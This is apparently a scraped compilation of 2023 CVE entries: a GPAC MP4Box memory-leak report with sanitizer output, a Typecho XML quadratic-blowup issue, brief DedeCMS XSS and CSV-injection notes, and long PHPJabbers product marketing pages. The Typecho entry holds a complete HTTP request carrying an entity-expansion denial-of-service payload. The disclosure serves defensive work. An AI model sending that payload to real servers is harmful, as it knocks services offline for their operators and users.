GPAC version 2.3-DEV-rev602-ged8424300-master in MP4Box contains a memory leak in NewSFDouble scenegraph/vrml_tools.c:300. This vulnerability may lead to a denial of service.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/bug-reporting/

1、version  
./MP4Box -version  
MP4Box - GPAC version 2.3-DEV-rev602-ged8424300-master  
(c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io

Please cite our work in your research:  
GPAC Filters: https://doi.org/10.1145/3339825.3394929  
GPAC: https://doi.org/10.1145/1291233.1291452

GPAC Configuration:  
Features: GPAC\_CONFIG\_LINUX GPAC\_64\_BITS GPAC\_HAS\_IPV6 GPAC\_HAS\_SSL GPAC\_HAS\_SOCK\_UN GPAC\_MINIMAL\_ODF GPAC\_HAS\_QJS GPAC\_HAS\_JPEG GPAC\_HAS\_PNG GPAC\_HAS\_LINUX\_DVB GPAC\_DISABLE\_3D

2、platform  
uname -a  
Linux returnzero-virtual-machine 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT\_DYNAMIC Fri Oct 6 10:23:26 UTC 2 x86\_64 x86\_64 x86\_64 GNU/Linux

3、Reproduce  
./MP4Box -bt $poc

4、ASCAN  
./MP4Box -bt '/home/returnzero/gpac/out/default/crashes/id:000000,sig:06,src:000008,time:167295,execs:4216,op:havoc,rep:6'  
\[iso file\] extra box maxr found in hinf, deleting  
\[iso file\] Unknown box type traI in parent moov  
\[iso file\] Box "stss" (start 9939) has 32 extra bytes  
\[iso file\] extra box maxr found in hinf, deleting  
\[iso file\] Track with no sample description box !  
\[iso file\] Incomplete box mdat - start 11495 size 861217  
\[iso file\] Incomplete file while reading for dump - aborting parsing  
\[iso file\] extra box maxr found in hinf, deleting  
\[iso file\] Unknown box type traI in parent moov  
\[iso file\] Box "stss" (start 9939) has 32 extra bytes  
\[iso file\] extra box maxr found in hinf, deleting  
\[iso file\] Track with no sample description box !  
\[iso file\] Incomplete box mdat - start 11495 size 861217  
\[iso file\] Incomplete file while reading for dump - aborting parsing  
MPEG-4 BIFS Scene Parsing  
\[MP4 Loading\] decoding sample 1 from track ID 8 failed  
Error loading scene: BitStream Not Compliant

    Error: BitStream Not Compliant
    

\=================================================================  
\==3703==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 8 byte(s) in 1 object(s) allocated from:  
#0 0x7f0d974b4887 in \_\_interceptor\_malloc ../../../../src/libsanitizer/asan/asan\_malloc\_linux.cpp:145  
#1 0x7f0d95d38b3b in NewSFDouble scenegraph/vrml\_tools.c:300  
#2 0x7f0d95d38b3b in gf\_sg\_vrml\_field\_pointer\_new scenegraph/vrml\_tools.c:558

SUMMARY: AddressSanitizer: 8 byte(s) leaked in 1 allocation(s).

5、Impact  
This vulnerability allows a remote attacker to cause a denial of service on an affected gpac MP4Box. Exploiting this vulnerability requires user interaction, as the target must access a malicious page or open a malicious file.

6、poc  
https://github.com/ReturnHere/CrashReport/blob/main/id%5E%25000000%2Csig%5E%2506%2Csrc%5E%25000008%2Ctime%5E%25167295%2Cexecs%5E%254216%2Cop%5E%25havoc%2Crep%5E%256

CVE-2023-46871: Memory leaks in NewSFDouble scenegraph/vrml_tools.c:300 · Issue #2658 · gpac/gpac

Typecho v1.2.1 was discovered to be vulnerable to an XML Quadratic Blowup attack via the component /index.php/action/xmlrpc.

    POST /index.php/action/xmlrpc HTTP/1.1
    Content-Length: 83630
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate,br
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Host: 192.168.160.147
    Connection: Keep-alive
    
    <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE lolz [
     <!ENTITY poc "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.............">
    ]>
    <methodCall>
      <methodName>aaa&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;</methodName>
      <params>
       <param><value>aa</value></param>
       <param><value>aa</value></param>
      </params>
    </methodCall>

CVE-2023-49967: Typecho v1.2.1 XML Blowup Attack DoS vulnerability · Issue #1648 · typecho/typecho

DedeCMS v5.7.111 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the v parameter at selectimages.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-49493: DedeCMS-V5.7.111 Reflective XSS vulnerability · Issue #2 · Hebing123/cve

Appointment Scheduler 3.0 is vulnerable to CSV Injection via a Language > Labels > Export action.

Online appointment scheduling software to boost sales and manage bookings

Version: 3.0

Embed an easy appointment booking system into your website and manage appointment calendars, individual schedules, services, and rates. Our PHP-based Appointment Scheduler script is a flexible and highly efficient software solution suitable for various companies in the service sector. Use the appointment script as a standalone tool or easily integrate it into any other web-based system.

**Appointment Scheduler**

*   Highlights
*   Features
*   Demo
*   Faq
*   Knowledge Base
*   Pricing

**Product Highlights**

If you're looking for reliable online scheduling software that will help you organize your service schedule more efficiently, the Appointment Scheduler might just be the right solution for you! Give your customers an easy way to book and pay for the services you offer.

Book Appointments

Embed an online self-booking appointment scheduling tool to let clients book individual appointments and pay online.

Get Detailed Reports

You can get detailed reports in colorful graphic charts that help you monitor and understand the data easily.

Responsive Design

Both the front-end and back-end UI of our online Appointment Scheduler script are mobile-friendly and adapt to various screen sizes so you can access them on any device.

Add Multiple Languages

Easily translate the appointment scheduling script into any language and add it on the front end with a drop-down menu.

10 Responsive Front-End Themes

Choose between 10 different color themes for the mobile-friendly front end. We can further customize the themes for you upon request.

Confirmations & Reminders

The back-end system sends booking and payment notifications and reminders to both clients and admins via email & SMS.

Automatically Updated Schedule

The appointment scheduling software automatically updates the work timesheet and employees' availability.

PHP Source Code Customization

Get a developer-friendly license and make changes to our scheduling software. Or, request us to do them for you.

SPECIAL OFFER

**Appointment Scheduler for €4.59 Only**

Get all 65 PHPJabbers scripts in a bundle for just €279.

**Live Demo**

Preview both the front end and back end of the Appointment Scheduler and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Appointment Scheduler**

**Key Benefits**

Payment Gateways

One admiN

Extended Licence

Installation Support

Script Modifications

**Pricing**

You can buy the Appointment Scheduler script both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

€4.59

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

€4.59 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

€279

VIEW DETAILS

**Testimonials**

Let our clients share their experience with the Appointment Scheduler and how the script has improved their online business.

“

I found PHPJabbers customer service to be second to none. You guys truly stand behind your product. I will not hesitate to purchase any other PHP script I may need in the future from your company. Thank you so much for helping me install your appointment calendar on my site.

Pedro Baez

“

I found the PHPJabbers website while searching for appointment scheduling software. I'm so glad I found the site because there are loads of useful other scripts which I will no doubt use. All the scripts have a nice clean format which can be easily integrated into any website. The functionality is perfect for what I needed and the Appointment Scheduler script works well. I called on the help of the support team to install the script and they responded quickly and had me up and running in no time. I can't believe what excellent value the scripts provide and I am now about to purchase another PHP script for a new website I am working on. Brilliant work PHPJabbers, well done and many thanks.

Dean Williams

“

Excellent customer service. Looking forward to a long and prosperous relationship.

Ron Angelo

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Appointment Scheduler.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Time Slots Booking Calendar**

**Service Booking Script**

**Class Scheduling System**

**Cleaning Business Software**

**Availability Booking Calendar**

**Meeting Room Booking System**

CVE-2023-48841: Appointment Scheduler | Appointment Scheduling Software

A lack of rate limiting in pjActionAJaxSend in Time Slots Booking Calendar 4.0 allows attackers to cause resource exhaustion.

Make appointment booking and online scheduling easy with our time slot booking system!

Version: 3.3

Time Slots Booking Calendar is a real-time appointment calendar and online booking system that allows clients to book appointments with you. With the Time Slots Booking Calendar, you can schedule meetings both for individual and group appointments, while avoiding double bookings. Whether you're a hairdresser, therapist, or wellness worker, this is the perfect appointment booking software for your booking page. The setup is simple, with copy-paste script integration. Let your visitors schedule appointments, easily!

**Time Slots Booking Calendar**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Does your business involve scheduled services? Then you should consider adding a simple appointment scheduling software to your website to help you automate the booking process. Here are the features you can benefit from with our Time Slots Booking Calendar:

Configure time slots

Configure time slot length and add either regular or custom time slot lengths for any calendar date.

Front-end layouts

There are two front-end layouts for Time Slots Booking Calendar that work well both for iOS and Android devices. Switch between them using a simple drop-down menu.

Accept deposit payments

The time slot calendar supports online payments via PayPal, Authorize.net, as well as credit card payments and wire transfers.

Translate the calendar

Translate the booking calendar to any language you like thanks to a simple built-in language editor available in the Admin Panel.

Manage working hours

Edit and update your business hours as well as regular and custom work dates. This includes editing slot lengths, displaying lunch breaks, and adding days off.

Email & SMS notifications

Set default email & SMS reminders and send them out both to your own staff as well as clients to help reduce cancellations and no-shows.

Book group appointments

Use the time slot booking system to set up an online booking system for reserving group appointments.

Make custom changes

Get the Developer License and modify the Time Slots Booking Calendar according to your needs. Or ask us to do it for you! Compare licenses

SPECIAL OFFER

**Time Slots Booking Calendar for €4.59 Only**

Get all 65 PHPJabbers scripts in a bundle for just €279.

**Live Demo**

Below is a preview of the Time Slots Booking Calendar. You can see both the front and the back-end view and test out all the functionalities.  
If you have any questions, do not hesitate to contact us.

**Time Slots Booking Calendar**

**Key Benefits**

Script Modifications

Remote Hosting

High Performance

Installation Support

Extended Licence

**Pricing**

You can buy the Time Slots Booking Calendar both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

€4.59

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

€4.59 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

€279

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our appointment booking calendar and how the script has improved their online business.

“

Having wasted 3 days on finding a workable open source calendar booking script I finally decided to buy your excellent Time Slots Booking Calendar in order to run a tennis court booking system. The script was 90% perfect for the job but required some key modifications such as repeat and block booking and deletion. The service provided by PHPJabbers was incredibly fast, efficient and inexpensive. Thank you to Alexander 'Sasho' Valkanov for a superb job. I am happy to thoroughly recommend your PHP booking scripts and service to everyone. Fantastic service, really impressed.  
U2R Design, United Kingdom

Chris Woods

“

I am really happy to have found PHPJabbers.com. This is the first time I outsourced work and so I was quite nervous about doing it. But PHPJabbers team did a great job. They were able to make all the modifications I requested on quite a difficult booking system job. Kosta Todorov is very smart. I couldn't ask for a better team.

Mia Johnson

“

PHPjabbers has the most in-depth calendar software solution I've found on the web. The time slot booking system functions are great and offers everything we need and more. More importantly, the support we have received has been the best ever!!! They are fast, reliable and affordable. Thank you so much for making this booking calendar script such a wonderful solution for us!

Zach Kosturos

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Time Slots Booking Calendar.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Appointment Scheduler**

**Availability Booking Calendar**

**Event Booking Calendar**

**Class Scheduling System**

**Service Booking Script**

**Event Ticketing System**

CVE-2023-48833: Time Slots Booking Calendar | PHPJabbers

A lack of rate limiting in pjActionAJaxSend in Availability Booking Calendar 5.0 allows attackers to cause resource exhaustion.

A customizable PHP booking calendar script with multi-calendar support

Version: 5.0

The Availability Booking Calendar is a PHP calendar booking system that shows availability, allows bookings with a few easy steps, accepts online payments, and lets you manage reservations and bookings. Our script is suitable for single accommodation facilities such as holiday rentals, private villas, and apartments. Availability Booking Calendar script allows you to change colors, edit languages, create booking forms, and control settings. Get the PHP booking calendar script with the Developer License and customize it as you need.

**Availability Booking Calendar**

